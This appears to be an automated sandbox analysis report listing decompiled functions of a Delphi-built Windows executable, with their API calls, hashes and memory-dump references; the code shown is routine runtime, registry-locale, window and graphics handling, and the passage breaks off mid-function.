Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A64(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405CA0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405a6c
0x00405a72
0x00405a7e
0x00405a82
0x00405a8b
0x00405a90
0x00405a92
0x00405a97
0x00405a99
0x00405a9c
0x00405a9c
0x00405a97
0x00405a9f
0x00405aaa

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?,00000400,?,004104AC,0041416B,00000000,00414190), ref: 00405A82

Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1FC, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D1FC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x492a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x492a1c; // 0x610000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029BC(0x4764bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041D1F4(_t2, E0041D1D4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041D1F4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x492a20;
						 *0x492a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x492a1c = _t35;
				}
				_t25 =  *0x492a20;
				 *0x492a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x492a20;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction ID: 4e78e070f51fdf12da19326942a77fcdf1f829aea583b288c94c8dd1e240b39b
Opcode Fuzzy Hash: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction Fuzzy Hash: 62115AB56403059FC720DF19C880B82F7E5EF98350F10C53BE9A99B385D3B8E9458BA9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0043C504, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043C504(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E004351C8(_t43);
			}

APIs

IsIconic.USER32 ref: 0043C513
GetWindowPlacement.USER32(?,0000002C), ref: 0043C530
GetWindowRect.USER32 ref: 0043C549
GetWindowLongA.USER32 ref: 0043C557
GetWindowLongA.USER32 ref: 0043C56C
ScreenToClient.USER32 ref: 0043C579
ScreenToClient.USER32 ref: 0043C584

Strings

,, xrefs: 0043C51C

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction ID: 813972987c9af47017c6e8c0ff2830ba60c29583813e2a484c0d43f261c6bbd2
Opcode Fuzzy Hash: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction Fuzzy Hash: 4D117F71504211ABCB01DF6DC885A9B77D8AF0D314F14462EFE58EB386D739E9048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0043061C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043061C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x430699);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00430068(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0042FCC0(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047F8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x4306a0);
				return E00404348( &_v8);
			}

APIs

Part of subcall function 00430068: WinHelpA.USER32 ref: 00430077

GetTickCount.KERNEL32 ref: 0043063A
Sleep.KERNEL32(00000000,00000000,00430699,?,?,00000000,00000000,?,0043060F), ref: 00430643
GetTickCount.KERNEL32 ref: 00430648
WinHelpA.USER32 ref: 0043067E

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
Instruction ID: 75981a8233ee4d01c2f1e5df9000261321f57b032b19e9e9952387f5457eb5df
Opcode Fuzzy Hash: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
Instruction Fuzzy Hash: D8018F70700604AFE311FBBACC63B1DB2A8DB88B14F62417BF504A76C1DA786E10856D

Uniqueness

Uniqueness Score: -1.00%

Function 00440918, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00440918() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x440a7e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x492bc0 == 0) {
						 *0x492bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x476a2c == 0) {
						 *0x476a2c = LoadLibraryA("IMM32.DLL");
						if( *0x476a2c != 0) {
							_t11 =  *0x476a2c; // 0x0
							 *0x492bc4 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x476a2c; // 0x0
							 *0x492bc8 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x476a2c; // 0x0
							 *0x492bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x476a2c; // 0x0
							 *0x492bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x476a2c; // 0x0
							 *0x492bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x476a2c; // 0x0
							 *0x492bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x476a2c; // 0x0
							 *0x492bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x476a2c; // 0x0
							 *0x492be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x476a2c; // 0x0
							 *0x492be4 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x476a2c; // 0x0
							 *0x492be8 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440a85);
					return SetErrorMode(_v8);
				}
			}

APIs

SetErrorMode.KERNEL32(00008000), ref: 00440931
GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Strings

USER32, xrefs: 00440950
IMM32.DLL, xrefs: 00440979
ImmGetCompositionStringA, xrefs: 00440A28
ImmSetCompositionFontA, xrefs: 00440A13
ImmSetOpenStatus, xrefs: 004409E9
ImmIsIME, xrefs: 00440A3D
ImmSetConversionStatus, xrefs: 004409D4
ImmReleaseContext, xrefs: 004409AA
ImmGetConversionStatus, xrefs: 004409BF
WINNLSEnableIME, xrefs: 0044095C
ImmNotifyIME, xrefs: 00440A52
ImmSetCompositionWindow, xrefs: 004409FE
ImmGetContext, xrefs: 00440995

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
API String ID: 3397921170-3271328588
Opcode ID: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction ID: 22175355cffe4bfeaf4df66fa745304b851485a7c6d64ee71613be57ccea2247
Opcode Fuzzy Hash: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction Fuzzy Hash: F831B6B1650B00EFE740EFB5ED16A253BE9E319304B12843BF209B7591C67D98608F5C

Uniqueness

Uniqueness Score: -1.00%

Function 00424094, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00424094(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00423588(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x42428f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E00420AFC(GetDC(0));
					_v20 = E00420AFC(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L18:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x424296);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E00420AFC(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x424247);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E004239CC(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x42424e);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 004240B7
GetDC.USER32(00000000), ref: 004240E5
CreateCompatibleDC.GDI32(?), ref: 004240F6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00424111
SelectObject.GDI32(?,00000000), ref: 0042412B
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042414D
CreateCompatibleDC.GDI32(?), ref: 0042415B
SelectObject.GDI32(00000000,00000000), ref: 004241A3
SelectPalette.GDI32(00000000,?,00000000), ref: 004241B6
RealizePalette.GDI32(00000000), ref: 004241BF
SelectPalette.GDI32(?,?,00000000), ref: 004241CB
RealizePalette.GDI32(?), ref: 004241D4
SetBkColor.GDI32(00000000,00000000), ref: 004241DE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00424202
SetBkColor.GDI32(00000000,00000000), ref: 0042420C
SelectObject.GDI32(00000000,00000000), ref: 0042421F
DeleteObject.GDI32(00000000), ref: 0042422B
DeleteDC.GDI32(00000000), ref: 00424241
SelectObject.GDI32(?,00000000), ref: 0042425C
DeleteDC.GDI32(00000000), ref: 00424278
ReleaseDC.USER32 ref: 00424289

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction ID: efd02d1a875929a6837f3824ff537185af59d8eb039b0b63219b306ede86c4ac
Opcode Fuzzy Hash: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction Fuzzy Hash: F7516E71F04324ABDB10EBEADC45FAEB7FCEB48704F51446AB614F7281C67899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00424598, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424598(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t173);
				E00424C08(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L4:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L4;
					}
				}
				if(_t82 == 0) {
					if(E00424924(_t165) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BA8(_t165, _t166);
				}
				_t89 = E00424868(_t165);
				_t177 =  *0x4247e4; // 0xf
				E004207D8(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424868(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E004247DC);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420AFC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CA0( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424868(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247af);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}

APIs

Part of subcall function 00424C08: GetDC.USER32(00000000), ref: 00424C5E
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: ReleaseDC.USER32 ref: 00424CAC

SelectPalette.GDI32(?,?,000000FF), ref: 004245DA
RealizePalette.GDI32(?), ref: 004245E9
GetDeviceCaps.GDI32(?,0000000C), ref: 004245FB
GetDeviceCaps.GDI32(?,0000000E), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
SetStretchBltMode.GDI32(00000000,00000003), ref: 00424681
CreateCompatibleDC.GDI32(00000000), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6
SelectObject.GDI32(?,00000000), ref: 00424755
DeleteDC.GDI32(00000000), ref: 00424764

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction ID: d8dca1dc3148269436b121e867a8f998dbdffe145855f72674f5f49c2dbe5de2
Opcode Fuzzy Hash: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction Fuzzy Hash: EE718AB5B00215AFCB40EFA9C985F5EB7F8EB89304F51856AB508E7281C738ED00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00424596, Relevance: 16.7, APIs: 11, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424596(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t173);
				E00424C08(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
